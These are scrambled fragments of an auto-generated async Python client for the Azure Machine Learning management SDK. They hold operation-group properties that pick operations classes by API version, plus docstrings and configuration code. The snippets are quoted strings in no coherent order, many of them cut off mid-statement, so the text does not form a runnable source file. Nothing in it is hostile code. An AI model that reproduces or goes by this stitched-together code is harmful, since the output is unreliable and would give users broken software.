self._get_api_version('online_endpoints')", "= self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else:", "ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as", "* 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "== 'v1.0': from ..registry_discovery import models return models elif api_version == 'v1.0': from", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version: *", "version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version =", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version: *", "from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance", "have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01':", "self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version:", ":class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from", "{} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API", "import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as", "ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview':", "the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID", "else: raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client,", "the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version ==", "from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API", "def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return", "self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise", "'2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from ..v2021_10_01", "does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self):", "import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING:", "the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version ==", "\"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version:", "raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version", "depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version", "depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if", "\"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs')", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return", "**kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API", "does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from", "else: raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client,", "import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return", "version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version ==", "= self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else:", "the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\"", "version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version", "removed in final version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin,", "'1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0',", "from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01':", "v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import", "* 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions')", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API", "API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01:", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif", "version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>`", "does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return", "self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version", "_SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class to support current", "the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` *", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API", "does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass", "DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass", "@property def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` *", "a fake class to support current implemetation of MultiApiClientMixin.\" Will be removed in", "api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on", "version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version ==", "use if no profile is provided, or if missing in profile. :type api_version:", "AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import", "@property def delete(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` *", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version", "on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>`", "raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config,", "ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass", "else: raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client,", "from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does not", "== '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version", "# Changes may cause incorrect behavior and will be lost if the code", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "* 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return", "does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01':", "* 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers')", "@property def operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` *", "License. See License.txt in the project root for # license information. # #", "* 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` *", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version", "PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "{} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version))", "the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version ==", ":mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>`", "operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends", "* 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers')", "Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>`", "..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations", "import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version))", "{} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "The profile sets a mapping between an operation group and its API version.", "from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self,", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` *", "k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version =", "TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class", "..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations", ":class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version", ":class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations", "= self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else:", "import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as", "EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations", "if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version: *", "two polls for LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else:", "group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on", "== '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "async def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return", "not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self):", "def code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview:", "super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for", "Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>`", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise", "depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01:", "2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "{} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", ":class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations", "\"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as", "not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self):", "have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance", "By default, it uses the latest API version available on public Azure. For", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API version: *", "API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = 